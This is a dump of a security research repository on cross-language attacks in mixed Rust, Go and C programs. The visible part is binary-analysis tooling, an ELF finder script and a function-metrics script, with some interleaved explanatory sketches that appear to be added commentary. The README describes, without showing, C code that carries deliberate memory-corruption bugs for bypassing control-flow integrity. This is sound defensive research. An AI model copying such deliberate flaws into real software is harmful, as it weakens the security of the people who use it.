├── LICENSE
├── README.md
├── SPDX.spdx
├── cla-README.pdf
├── cla-metrics
│   ├── .DS_Store
│   ├── README.md
│   ├── find_elf.sh
│   ├── fn_metrics.py
│   ├── input
│   │   ├── .DS_Store
│   │   ├── elfs
│   │   │   └── .placeholder
│   │   ├── objdumps
│   │   │   └── .placeholder
│   │   └── source-info.json
│   └── output
│       ├── .DS_Store
│       ├── elf-results
│       │   └── .placeholder
│       ├── graphs
│       │   └── .placeholder
│       └── obj-results
│           └── .placeholder
├── go-cla-examples
│   ├── Makefile
│   └── src
│       ├── init
│       │   ├── init.c
│       │   └── init.h
│       └── main.go
└── rust-cla-examples
    ├── Cargo.lock
    ├── Cargo.toml
    ├── Makefile
    ├── build.rs
    └── src
        ├── init
        │   ├── init.c
        │   └── init.h
        └── main.rs


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2022 MIT Lincoln Laboratory
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Overview
 2 | 
 3 | This repository contains the source code behind the NDSS '22 paper "Cross-Language Attacks", available [here](TODO).
 4 | 
 5 | The paper shows that adding code in "safe" languages such as Rust to applications written in unsafe languages such as C/C++ may undermine hardening techniques that have been applied to the C/C++ code. This paradoxical result shows the importance of having well-thought-out and consistent threat models. Here we provide the proofs of concept referenced in the paper, for both Rust and Go. We also provide the analysis scripts we used to gauge how prevalent these vulnerabilities might be in Firefox.
 6 | 
 7 | ## Objective
 8 | 
 9 | The objective of this project is to aid authors of multi-language software
10 | applications in hardening their code. Securing such applications effectively
11 | requires understanding the threat model that they face, and how different
12 | defenses compose. We hope that our exploration of this subject results in more
13 | secure software.
14 | 
15 | # Directory Layout
16 | 
17 | ## rust-cla-examples
18 | 
19 | In this directory, one can find a mixed-language application (MLA) with both Rust and C code that is vulnerable to a number of Cross-Language Attacks (CLAs). The C side of the program can be compiled either as a static library (libinit.a) or as a dynamic shared library (libinit.so). Furthermore, the C library is compiled with Control Flow Integrity (CFI) to prevent code-reuse attacks. However, the C code contains a series of spatial memory corruption errors (out-of-bounds, OOB) and temporal memory corruption errors (use-after-free, UAF, or double free) that an attacker can leverage to degrade the spatial and temporal safety of Rust or bypass the CFI protection on the C library.
20 | 
21 | ## go-cla-examples
22 | In this directory, one can find another mixed-language application (MLA) with both Go and C code that is vulnerable to a number of Cross-Language Attacks (CLAs). As in the Rust MLA example, the C side of the program can be compiled separately as a static library (libinit.a) or a dynamic shared library (libinit.so). These CLA examples contain a set of attacks similar to those in the Rust MLA.
23 | 
24 | ## cla-metrics
25 | A series of scripts to analyze mixed-language binaries for metrics that indicate the opportunity for a Cross-Language Attack (CLA).
26 | 
27 | # Disclaimer
28 | 
29 | Cross-Language Attacks is distributed under the terms of the MIT License.
30 | DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
31 | 
32 | © 2021 MASSACHUSETTS INSTITUTE OF TECHNOLOGY
33 | 
34 | 
35 |     Subject to FAR 52.227-11 – Patent Rights – Ownership by the Contractor (May 2014)
36 |     SPDX-License-Identifier: MIT
37 | 
38 | This material is based upon work supported by the Under Secretary of Defense (USD) for Research & Engineering (R&E) under Air Force Contract No. FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of USD (R&E).
39 | 
40 | The software/firmware is provided to you on an As-Is basis
41 | 


--------------------------------------------------------------------------------
/SPDX.spdx:
--------------------------------------------------------------------------------
1 | SPDXVersion: SPDX-2.1
2 | PackageName: Cross-Language Attacks
3 | PackageHomePage: https://github.com/mit-ll/cross-language-attacks/
4 | PackageOriginator: MIT Lincoln Laboratory
5 | PackageCopyrightText: 2021 Massachusetts Institute of Technology
6 | PackageLicenseDeclared: MIT
7 | 


--------------------------------------------------------------------------------
/cla-README.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-README.pdf


--------------------------------------------------------------------------------
/cla-metrics/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/.DS_Store


--------------------------------------------------------------------------------
/cla-metrics/README.md:
--------------------------------------------------------------------------------
1 | # cla-metrics
2 | A series of scripts to analyze mixed-language binaries for metrics that indicate the opportunity for a Cross-Language Attack (CLA).
3 | 

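The scripts in this directory share a fixed layout under `input/` and `output/`. As a rough sketch of that layout, assuming the paths hard-coded in `find_elf.sh` and `fn_metrics.py` below, the hypothetical helpers `paths_for` and `example_source_info` show where the artifacts for one binary live and the shape of `input/source-info.json` that `Tagger.tag_language` reads (a mapping from `"rust"`, `"c++"`, and `"c"` to lists of symbol names). The helper names, the binary name, and the symbol names are invented for illustration and are not part of the repository.

```python
import json

# Hypothetical helper: the paths mirror the string concatenations used in
# fn_metrics.py and find_elf.sh; the function itself is not in the repository.
def paths_for(binary):
    return {
        "elf": "input/elfs/" + binary + ".elf",
        "objdump": "input/objdumps/" + binary + ".objdump",
        "elf_results": "output/elf-results/" + binary + "_results.json",
        "obj_results": "output/obj-results/" + binary + "_results.json",
    }

# Hypothetical example of input/source-info.json: each language key maps to
# a list of symbol names known from the source to belong to that language.
def example_source_info():
    return {
        "rust": ["rust_entry_point"],  # invented symbol name
        "c++": ["_Z9cpp_entryv"],      # invented symbol name
        "c": ["init_library"],         # invented symbol name
    }

if __name__ == "__main__":
    print(json.dumps(paths_for("example.so"), indent=4))
    print(json.dumps(example_source_info(), indent=4))
```

Any of the three language keys may be absent or empty; `tag_language` checks for each key before iterating over it.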

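Telling languages apart in a mixed-language binary often starts with the symbol name. As a minimal sketch, assuming Rust is compiled with the v0 mangling scheme (symbols start with `_R`) and C++ uses the Itanium scheme (symbols start with `_Z`), the hypothetical function `guess_language` classifies a symbol by its prefix. Rust's legacy mangling also produces `_ZN...` symbols, so this heuristic would attribute those to C++. The sample symbols are invented.

```python
def guess_language(symbol):
    """Guess a symbol's source language from its mangling prefix."""
    if symbol.startswith("_R"):
        return "rust"     # Rust v0 mangling
    if symbol.startswith("_Z"):
        return "c++"      # Itanium C++ mangling (also used by legacy Rust)
    return "unknown"      # unmangled: plain C or an unmangled export

if __name__ == "__main__":
    # Invented sample symbols, for illustration only
    for sym in ["_RNvCs1234_7mycrate4main", "_ZN3foo3barEv", "init_library"]:
        print(sym, "->", guess_language(sym))
```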
--------------------------------------------------------------------------------
/cla-metrics/find_elf.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Used to collect a list of file names from a directory (recursively) that are elfs
 4 | 
 5 | # Input is the path to the search directory
 6 | path=$1
 7 | 
 8 | echo "Finding ELFs..."
 9 | 
10 | # Count the number of / in path to strip files later
11 | char="/"
12 | stripped=${path//[^$char]/}
13 | num=${#stripped}
14 | 
15 | if [ -f input/files.txt ]
16 | then
17 |   echo "Cleaning up input/files.txt"
18 |   rm input/files.txt
19 |   echo "Cleaning up input/elfs/"
20 |   rm input/elfs/*
21 |   echo "Cleaning up input/objdumps/"
22 |   rm input/objdumps/*
23 | fi
24 | 
25 | shopt -s globstar
26 | 
27 | count=0
28 | for f in "$path"**/*
29 | do
30 |   if file -L "$f" | grep -qi elf
31 |   then
32 |     # Skip certain files
33 |     if [[ $f =~ "Test" ]]
34 |     then
35 |       printf "Skipping %s\n" "$f"
36 |       continue
37 |     fi
38 | 
39 |     if [[ $f == *.jsm ]]
40 |     then
41 |       printf "Skipping %s\n" "$f"
42 |       continue
43 |     fi
44 | 
45 |     if [[ $f == *.objdump ]]
46 |     then
47 |       printf "Skipping %s\n" "$f"
48 |       continue
49 |     fi
50 | 
51 |     # holds binary name
52 |     b=$f
53 | 
54 |     # strip path from binary name
55 |     for i in $(eval echo {1..$num})
56 |     do
57 |         b="${b#*/}"
58 |     done
59 | 
60 |     # count remaining paths for this file
61 |     strippedb=${b//[^$char]/}
62 |     numb=${#strippedb}
63 | 
64 |     # strip rest of path from binary name
65 |     for i in $(eval echo {1..$numb})
66 |     do
67 |         b="${b#*/}"
68 |     done
69 | 
70 |     ((count+=1))
71 |     printf "File #%s: %s\n" "$count" "$b"
72 |     objdump -d "$f" > "input/objdumps/$b.objdump"
73 |     cp "$f" "input/elfs/$b.elf"
74 |     echo "$b" >> input/files.txt
75 |   fi
76 | done
77 | 

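The script above relies on `file` and `grep` to spot ELF binaries; because `file` prints the file name too, that check can also match paths that merely contain "elf". A rough Python alternative, which swaps in a different technique (checking the four-byte ELF magic number at the start of each file), might look like the sketch below. The function names `is_elf` and `find_elfs` are hypothetical, and this sketch applies the name-based skips to the path relative to the search root rather than to the full path.

```python
import os

ELF_MAGIC = b"\x7fELF"  # first four bytes of every ELF file

def is_elf(path):
    """Return True if the file at `path` starts with the ELF magic bytes."""
    try:
        with open(path, "rb") as f:
            return f.read(4) == ELF_MAGIC
    except OSError:
        return False

def find_elfs(root):
    """Yield paths of ELF files under `root`, skipping the names find_elf.sh skips."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # Same skip rules as the shell script: "Test", *.jsm, *.objdump
            if "Test" in rel or name.endswith((".jsm", ".objdump")):
                continue
            if is_elf(path):
                yield path
```

Reading the magic bytes avoids spawning a process per file, at the cost of not distinguishing ELF subtypes the way `file` does.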

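`fn_metrics.py`, listed next, derives a per-function call list from `objdump -d` output. A condensed sketch of that idea is shown below, assuming x86-64 disassembly in which function headers look like `0000000000001139 <main>:` and direct calls carry a trailing `<target>` annotation. The function name `count_calls` and the sample disassembly are hypothetical, and the regular expressions are simplified relative to the script.

```python
import re

FUNC_START = re.compile(r"^[0-9a-f]{16} <(.+)>:$")  # function header line
CALL = re.compile(r"\scallq?\s")                    # call mnemonic only
TARGET = re.compile(r"<(.+)>$")                     # trailing <symbol>

def count_calls(lines):
    """Map each function to its direct call targets and indirect call count."""
    result = {}
    current = None
    for line in lines:
        line = line.rstrip()
        start = FUNC_START.match(line)
        if start:
            current = start.group(1)
            result[current] = {"direct": [], "indirect": 0}
            continue
        if current is None or not CALL.search(line):
            continue
        target = TARGET.search(line)
        if target:
            result[current]["direct"].append(target.group(1))
        else:
            # No <symbol> annotation: assume an indirect call (e.g. call *%rax)
            result[current]["indirect"] += 1
    return result

# Invented sample disassembly, for illustration only
SAMPLE = """\
0000000000001139 <main>:
    1139:\t55                   \tpush   %rbp
    113d:\te8 ee fe ff ff       \tcall   1030 <puts@plt>
    1142:\tff d0                \tcall   *%rax
    1144:\tc3                   \tret
"""

if __name__ == "__main__":
    print(count_calls(SAMPLE.splitlines()))
```

Keeping the indirect-call count in its own field, rather than appending it to the call list, avoids having to remember which list element is a count.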
--------------------------------------------------------------------------------
/cla-metrics/fn_metrics.py:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/python
   2 | # Authors: Samuel Mergendahl and Nathan Burow 
   3 | # Copyright: MIT Lincoln Laboratory
   4 | 
   5 | import sys
   6 | import re
   7 | import struct
   8 | import json
   9 | import numpy as np
  10 | import matplotlib
  11 | import matplotlib.pyplot as plt
  12 | 
  13 | from argparse import ArgumentParser
  14 | from elftools.elf.elffile import ELFFile
  15 | 
  16 | # Object that helps retrieve CLA-relevant info from an ELF File 
  17 | class Tagger:
  18 | 
  19 |     # Initializes the Tagger Class
  20 |     def __init__(self, e, f, r_path, n):
  21 | 
  22 |         # Tags holds all the metadata
  23 |         self.tags = {}
  24 | 
  25 |         # elf holds functions to search the elffile
  26 |         #with open(e_path, "rb") as f:
  27 |         self.elf = ELFFile(e)
  28 | 
  29 |         # fns holds incoming metadata derived from the high-level source
  30 |         #with open(f_path, "rb") as f:
  31 |         self.fns = json.load(f)
  32 | 
  33 |         # res holds the path to store derived metadata
  34 |         self.res = r_path
  35 | 
  36 |         # bin_name holds the name of the elf binary
  37 |         self.bin_name = n
  38 | 
  39 |         # Main language variable defaults to c++
  40 |         self.main_lang = "c++"
  41 | 
  42 |         # elf assembly flavor 
  43 |         self.assembly = "x86"
  44 | 
  45 |     # Main function to append metadata to tags
  46 |     def tag(self, name, field, tag):
  47 | 
  48 |         # Adds a newly seen function to the metadata
  49 |         if name not in self.tags:
  50 |             self.tags[name] = {field:tag}
  51 | 
  52 |         # Adds a newly seen metadata field to an already seen function
  53 |         elif field not in self.tags[name]:
  54 |             self.tags[name][field] = tag
  55 | 
  56 |         # Appends metadata to an already seen field for a function
  57 |         else:
  58 |             tmp = self.tags[name][field]
  59 |             if type(tmp) is not list:
  60 |                 tmp = [tmp]
  61 |             tmp.append(tag)
  62 |             self.tags[name][field] = tmp
  63 | 
  64 |     # Finds all the function names and initializes the tags metadata with all function names in elf
  65 |     def get_all_fns(self):
  66 | 
  67 |         # Check if we can use dwarf information
  68 |         if self.elf.has_dwarf_info:
  69 |             print(str(self.bin_name) + " has dwarf info!")
  70 |             dwarf_info = self.elf.get_dwarf_info()
  71 | 
  72 |         # Iterate through the entire symbol table
  73 |         stab = self.elf.get_section_by_name(".symtab")
  74 |         for symb in stab.iter_symbols():
  75 | 
  76 |             # Ignore empty, already seen, and symbol names without an address
  77 |             # TODO: should we add a not null qualifier? 
  78 |             if symb.name != "" and symb.name not in self.tags and symb["st_value"] != 0:
  79 | 
  80 |                 # Symbol table value is virtual address, so make relative to .text
  81 |                 text = self.elf.get_section_by_name(".text")
  82 |                 offset = symb["st_value"] - text["sh_addr"]
  83 |                 size = symb["st_size"]
  84 |                 start = symb["st_value"]
  85 | 
  86 |                 self.tag(symb.name, "addr", symb["st_value"])
  87 | 
  88 |     # For each function in the ELF, determine if it is a static, dynamic, closure, etc. 
  89 |     def tag_function_type(self):
  90 |         # Check if we can use dwarf information
  91 |         if self.elf.has_dwarf_info:
  92 |             print(str(self.bin_name) + " has dwarf info!")
  93 |             dwarf_info = self.elf.get_dwarf_info()
  94 | 
  95 |         # Iterate through the entire symbol table
  96 |         stab = self.elf.get_section_by_name(".symtab")
  97 |         for symb in stab.iter_symbols():
  98 | 
  99 |             # Ignore empty, null, and symbol names without an address
 100 |             if symb.name != "" and symb.name and symb["st_value"] != 0:
 101 | 
 102 |                 # Some shorter names
 103 |                 name = symb.name
 104 |                 fn = symb 
 105 | 
 106 |                 # No need to work if we already identified the type 
 107 |                 if "type" not in self.tags[fn.name]:
 108 | 
 109 |                     # Tag v0 mangler types
 110 |                     if fn.name.startswith('_R'):
 111 | 
 112 |                         # Set main language global as rust since only rust uses v0
 113 |                         self.main_lang = "rust"
 114 | 
 115 |                         # Closure
 116 |                         if 'CN' in fn.name:
 117 |                             self.tag(name, "type", "closure")
 118 |                         # TODO: Dynamic dispatch
 119 |                         #elif 'N' in fn.name:
 120 |                         #    self.tag(name, "type", "dynamic")
 121 |                         # Generic arguments impl
 122 |                         elif 'IN' in fn.name:
 123 |                             self.tag(name, "type", "static")
 124 |                         # Inherit impl root
 125 |                         elif 'X' in fn.name:
 126 |                             self.tag(name, "type", "static")
 127 |                         # Trait impl root
 128 |                         elif 'M' in fn.name:
 129 |                             self.tag(name, "type", "static")
 130 |                         elif 'N' in fn.name:
 131 |                             self.tag(name, "type", "free_fn")
 132 | 
 133 |                     # Tag legacy mangler types
 134 |                     elif fn.name.startswith('_Z'):
 135 | 
 136 |                         # Set main language global as c++ 
 137 |                         # (assume that rust is compiled with v0)
 138 |                         self.main_lang = "c++"
 139 | 
 140 |                         # TODO: More expressive function types for C++
 141 |                         if 'ZN' in fn.name:
 142 |                             self.tag(name, "type", "static")
 143 |                         else:
 144 |                             self.tag(name, "type", "free_fn")
 145 | 
 146 |                     # This script only analyzes v0 Rust manglers or typical C++ manglers 
 147 |                     else:
 148 |                         self.tag(name, "type", "unknown")
 149 | 
 150 |     # For each function in the ELF, determine if it is a C/C++ or Rust function 
 151 |     def tag_language(self):
 152 | 
 153 |         # Check if we can use dwarf information
 154 |         if self.elf.has_dwarf_info:
 155 |             print(str(self.bin_name) + " has dwarf info!")
 156 |             dwarf_info = self.elf.get_dwarf_info()
 157 | 
 158 |         # Use source level info to get language
 159 |         stab = self.elf.get_section_by_name(".symtab")
 160 |         if "rust" in self.fns.keys():
 161 |             if self.fns["rust"]:
 162 |                 for rust_fn in self.fns["rust"]:
 163 |                     possible_funcs = list(filter(lambda s: rust_fn == s.name, stab.iter_symbols()))
 164 |                     for fn in possible_funcs:
 165 |                         print("tagging " + str(fn.name) + " as a rust function")
 166 |                         self.tag(fn.name, "lang", "rust")
 167 | 
 168 |         if "c++" in self.fns.keys():
 169 |             if self.fns["c++"]:
 170 |                 for c_fn in self.fns["c++"]:
 171 |                     possible_funcs = list(filter(lambda s: c_fn == s.name, stab.iter_symbols()))
 172 |                     for fn in possible_funcs:
 173 |                         print("tagging " + str(fn.name) + " as a c++ function")
 174 |                         self.tag(fn.name, "lang", "c++")
 175 | 
 176 |         if "c" in self.fns.keys():
 177 |             if self.fns["c"]:
 178 |                 for c_fn in self.fns["c"]:
 179 |                     possible_funcs = list(filter(lambda s: c_fn == s.name, stab.iter_symbols()))
 180 |                     for fn in possible_funcs:
 181 |                         print("tagging " + str(fn.name) + " as a c function")
 182 |                         self.tag(fn.name, "lang", "c")
 183 | 
 184 |         # Use name mangling info to get language
 185 |         stab = self.elf.get_section_by_name(".symtab")
 186 |         for symb in stab.iter_symbols():
 187 | 
 188 |             # Ignore empty, null, and symbol names without an address
 189 |             if symb.name != "" and symb.name and symb["st_value"] != 0:
 190 | 
 191 |                 func_name = symb.name
 192 | 
 193 |                 # No need to work if we already identified the language 
 194 |                 if "lang" not in self.tags[symb.name]:
 195 |                     mangled = False
 196 | 
 197 |                     # Simple check to see if the name is mangled in any way
 198 |                     # I.e., if there is at least one uppercase character, assume mangled
 199 |                     # Okay to overestimate the mangled names, 
 200 |                     # as it will only underestimate the number of external functions
 201 |                     if sum(1 for c in symb.name if c.isupper()) > 0:
 202 |                         mangled = True
 203 | 
 204 |                     # tags the language and whether it is an external language call
 205 |                     if "lang" not in self.tags[func_name] and not mangled and self.tags[func_name]["type"] == "unknown" and self.main_lang == "c++":
 206 | 
 207 |                         # tag the language
 208 |                         if func_name.startswith("_"):
 209 |                             self.tag(func_name, "lang", "c")
 210 |                         else:
 211 |                             self.tag(func_name, "lang", "rust")
 212 | 
 213 |                         # also tag that it is an external language call
 214 |                         self.tags[func_name]["type"] = "external"
 215 | 
 216 |                     elif "lang" not in self.tags[func_name] and not mangled and self.tags[func_name]["type"] == "unknown" and self.main_lang == "rust":
 217 |                         # tag the language
 218 |                         if func_name.startswith("_"):
 219 |                             self.tag(func_name, "lang", "c")
 220 |                         else:
 221 |                             self.tag(func_name, "lang", "c++")
 222 | 
 223 |                         # also tag that it is an external language call
 224 |                         self.tags[func_name]["type"] = "external"
 225 | 
 226 |                     elif "lang" not in self.tags[func_name]:
 227 |                         # tag the language
 228 |                         self.tag(func_name, "lang", self.main_lang)
 229 | 
 230 |     # Save the collected tags metadata to a file
 231 |     def save_results(self):
 232 |         with open(self.res, "w") as f:
 233 |             json.dump(self.tags, f, indent=4)
 234 | 
 235 | # This function uses the Tagger class to generate
 236 | # the function types and language of each function in the elf file 
 237 | # Stores results in a json file
 238 | def generate_elf_metrics(elf_path, fns_path, results_path, binary):
 239 |     print("Started ELF Tagging.")
 240 |     tagger = Tagger(elf_path, fns_path, results_path, binary)
 241 | 
 242 |     print("Initializing tags...")
 243 |     tagger.get_all_fns()
 244 | 
 245 |     print("Tagging function types...")
 246 |     tagger.tag_function_type()
 247 | 
 248 |     print("Tagging language...")
 249 |     tagger.tag_language()
 250 | 
 251 |     print("Saving results...")
 252 |     tagger.save_results()
 253 | 
 254 | # This function generates metrics for a series of elf binaries
 255 | # file path is a text file that holds the names of a bunch of elf files
 256 | def elf_reader(file_path):
 257 | 
 258 |     with open(file_path) as f:
 259 |         lines = [line.rstrip() for line in f]
 260 | 
 261 |         for binary in lines:
 262 |             # Skip jsm executables
 263 |             if "jsm" not in binary:
 264 |                 print("Generating elf metrics for: " + str(binary))
 265 |                 with open("input/source-info.json", "rb") as fns:
 266 |                     try:
 267 |                         with open("input/elfs/" + str(binary) + ".elf", "rb") as e:
 268 |                             generate_elf_metrics(e, fns, "output/elf-results/" + str(binary) + "_results.json", str(binary))
 269 |                     except IOError:
 270 |                         print("Error " + str(binary) + " does not exist.")
 271 | 
 272 | 
 273 | def generate_obj_metrics(obj_path, binary):
 274 |     functionStartRegex=re.compile(r"^[\da-f]{16} <.+>:$")
 275 |     callRegex = re.compile(r"call")
 276 |     functionName=re.compile(r"<(.+)>:?$")
 277 |     indirectCallRegex = re.compile(r"call.? *")
 278 |     
 279 |     functionToCalls = {}
 280 |     curFunc = ""
 281 |     indirectCallCount = 0
 282 |     count = 0
 283 |     with open(obj_path, "r") as fp:
 284 |         for line in fp:
 285 |             function = functionStartRegex.search(line)
 286 |             if function:
 287 |                 name = functionName.search(line)
 288 |                 if name:
 289 |                     #print("Current Function: " + str(name.group(1))
 290 |                     #TODO: check if this function already exists and handle it
 291 |                     #gracefully if so
 292 |                     functionToCalls[name.group(1)] = []
 293 |                     if curFunc:
 294 |                         functionToCalls[curFunc].append(indirectCallCount)
 295 |                         #if indirectCallCount:
 296 |                         #    print(str(curFunc) + " has " + str(indirectCallCount) + " indirect calls")
 297 |                     indirectCallCount = 0
 298 |                     curFunc = name.group(1)
 299 |                 else:
 300 |                     print("Couldn't find function name for line: " + str(line))
 301 |                     sys.exit(1)
 302 |             call = callRegex.search(line)
 303 |             if call:
 304 |                 name = functionName.search(line)
 305 |                 if name:
 306 |                     #print("\tCalls: " + str(name.group(1)))
 307 |                     functionToCalls[curFunc].append(name.group(1))
 308 |                 else:
 309 |                     if indirectCallRegex.search(line):
 310 |                         #print("Couldn't find name for: " + str(line) + " assuming indirect call")
 311 |                         indirectCallCount += 1
 312 |                     else:
 313 |                         print("Error on line: " + str(line))
 314 |                         print("Neither direct nor indirect")
 315 |                         sys.exit(1)
 316 |             count += 1
 317 |             if count % 1000000 == 0:
 318 |                 print(str(count / float(87087059) * 100) + "% complete")
 319 |    
 320 |     with open("output/obj-results/" + str(binary) + "_results.json", "w") as fp:
 321 |         json.dump(functionToCalls, fp, indent=4)
 322 | 
 323 | # This function generates metrics for a series of objdumps 
 324 | # file path is a text file that holds the names of a bunch of objdump files
 325 | def obj_reader(file_path):
 326 | 
 327 |     with open(file_path) as f:
 328 |         lines = [line.rstrip() for line in f]
 329 | 
 330 |         for binary in lines:
 331 |             # Skip jsm executables
 332 |             if "jsm" not in binary:
 333 |                 print("Generating obj metrics for: " + str(binary))
 334 |                 generate_obj_metrics("input/objdumps/" + str(binary) + ".objdump", str(binary))
 335 | 
 336 | # Combine objdump file processing from output/obj-results/ into one json file
 337 | def combine_obj_results(file_path):
 338 |     full_json = {} 
 339 | 
 340 |     with open(file_path) as f:
 341 |         lines = [line.rstrip() for line in f]
 342 |         for binary in lines:
 343 |             try:
 344 |                 with open("output/obj-results/" + str(binary) + "_results.json") as j:
 345 |                     res_data = json.load(j)
 346 | 
 347 |                     for fn_name in res_data.keys():
 348 |                         res_data_list = res_data[fn_name]
 349 |                         tmp_dict = {}
 350 |                         tmp_call_list = []
 351 | 
 352 |                         # Strip indirect calls
 353 |                         if not res_data_list:
 354 |                             num_indir_calls = float(0)
 355 |                         else:
 356 |                             num_indir_calls = res_data_list[-1]
 357 |                         tmp_dict["num_indirect_calls"] = num_indir_calls
 358 | 
 359 |                         # Strip dynamic calls info from name
 360 |                         tmp_dict["num_dynamic_calls"] = float(0)
 361 |                         if len(res_data_list) > 1:
 362 |                             for cs in res_data_list[:-1]:  # last entry is the indirect-call count
 363 | 
 364 |                                 # add @binary on the end of call site
 365 |                                 if '@' in str(cs):
 366 |                                     tmp_dict["num_dynamic_calls"] = tmp_dict["num_dynamic_calls"]+1
 367 |                                 else:
 368 |                                     cs = str(cs) + '@' + str(binary)
 369 | 
 370 |                                 # add to set first to prevent duplicates 
 371 |                                 tmp_set = set(tmp_call_list)
 372 |                                 tmp_set = tmp_set.union(set([cs]))
 373 |                                 tmp_call_list = list(tmp_set)
 374 |                                 #tmp_call_list.append(cs)
 375 | 
 376 |                         tmp_dict["call_sites"] = tmp_call_list 
 377 | 
 378 |                         # Add a unique token for the function to prevent repeated functions 
 379 |                         if '@' in str(fn_name):
 380 |                             full_json[str(fn_name)] = tmp_dict 
 381 |                         else:
 382 |                             full_json[str(fn_name) + "@" + str(binary)] = tmp_dict 
 383 | 
 384 |             except IOError:
 385 |                 print("Error " + str(binary) + " does not have any obj results.")
 386 | 
 387 |     with open("output/obj-results/full.json", "w") as f:
 388 |         json.dump(full_json, f, indent=4)
 389 | 
 390 | # Combine elf file processing from output/elf-results/ into one json file
 391 | def combine_elf_results(file_path):
 392 |     full_json = {} 
 393 | 
 394 |     with open(file_path) as f:
 395 |         lines = [line.rstrip() for line in f]
 396 |         for binary in lines:
 397 |             try:
 398 |                 with open("output/elf-results/" + str(binary) + "_results.json") as j:
 399 |                     res_data = json.load(j)
 400 | 
 401 |                     for fn_name in res_data.keys():
 402 |                         full_json[str(fn_name) + "@" + str(binary)] = res_data[fn_name]
 403 | 
 404 |             except IOError:
 405 |                 print("Error " + str(binary) + " does not have any elf results.")
 406 | 
 407 |     with open("output/elf-results/full.json", "w") as f:
 408 |         json.dump(full_json, f, indent=4)
 409 | 
 410 | # Combine elf processing with objdump processing
 411 | def combine_elf_and_obj_results():
 412 |     print("Opening elf results...")
 413 |     with open("output/elf-results/full.json") as fj:
 414 |         full_json = json.load(fj)
 415 | 
 416 |         print("Opening objdump results...")
 417 |         with open("output/obj-results/full.json") as dj:
 418 |             dump = json.load(dj)
 419 | 
 420 |             print("Iterating through objdump functions for std lib call sites...")
 421 |             for name in dump.keys():
 422 |                 for cs in dump[name]["call_sites"]:
 423 |                     if cs not in full_json:
 424 |                         if "+0x" not in cs:
 425 |                             if "LIBCXX" in cs or "libcxx" in cs or "LIBC++" in cs or "libc++" in cs or "GXX" in cs or "gxx" in cs: 
 426 |                                 full_json[cs] = {
 427 |                                         "addr": "unknown",
 428 |                                         "type": "free_fn",
 429 |                                         "lang": "c++",
 430 |                                         "call_sites": [],
 431 |                                         "num_indirect_calls": float(0),
 432 |                                         "num_dynamic_calls": float(0),
 433 |                                         }
 434 |                             elif "LIBC" in cs or "libc" in cs or "GCC" in cs or "GXX" in cs or "NSS" in cs or "nss" in cs:
 435 |                                 full_json[cs] = {
 436 |                                         "addr": "unknown",
 437 |                                         "type": "external",
 438 |                                         "lang": "c",
 439 |                                         "call_sites": [],
 440 |                                         "num_indirect_calls": float(0),
 441 |                                         "num_dynamic_calls": float(0),
 442 |                                         }
 443 | 
 444 |             print("Iterating through objdump functions...")
 445 |             for name in dump.keys():
 446 | 
 447 |                 if name in full_json.keys():
 448 |                     call_list = dump[name]["call_sites"]
 449 |                     try:
 450 |                         num_indirect = float(dump[name]["num_indirect_calls"])
 451 |                         num_dynamic = float(dump[name]["num_dynamic_calls"])
 452 |                     except Exception as e:
 453 |                         print(e)
 454 |                         print("...saving as 0 instead...")
 455 |                         num_indirect = float(0) 
 456 |                         num_dynamic = float(0) 
 457 | 
 458 |                     # Adds a call_sites metadata field to an already seen function
 459 |                     if "call_sites" not in full_json[name]:
 460 |                         full_json[name]["call_sites"] = call_list 
 461 |                         full_json[name]["num_indirect_calls"] = num_indirect 
 462 |                         full_json[name]["num_dynamic_calls"] = num_dynamic 
 463 | 
 464 |                     # Appends metadata to the already seen call_sites for a function
 465 |                     else:
 466 |                         tmp = full_json[name]["call_sites"]
 467 |                         tmp_set = set(tmp)
 468 |                         tmp_set = tmp_set.union(set(call_list))
 469 |                         full_json[name]["call_sites"] = list(tmp_set)
 470 | 
 471 |                         full_json[name]["num_indirect_calls"] = full_json[name]["num_indirect_calls"] + num_indirect 
 472 |                         full_json[name]["num_dynamic_calls"] = full_json[name]["num_dynamic_calls"] + num_dynamic 
 473 |                 else:
 474 |                     # Objdump found a function that the elf files couldn't
 475 |                     # Temporary solution: check if objdump has it as a @plt function
 476 |                     # Ignore all other cases
 477 |                     found = False
 478 |                     if "@plt" in name:
 479 |                         stripped_name = str(name).split('@')[0]
 480 | 
 481 |                         for n in full_json.keys():
 482 |                             if n.startswith(stripped_name) and not found:
 483 | 
 484 |                                 # Same as if we found it above, but need to use n to save rather than name
 485 |                                 call_list = dump[name]["call_sites"]
 486 |                                 try:
 487 |                                     num_indirect = float(dump[name]["num_indirect_calls"])
 488 |                                     num_dynamic = float(dump[name]["num_dynamic_calls"])
 489 |                                 except Exception as e:
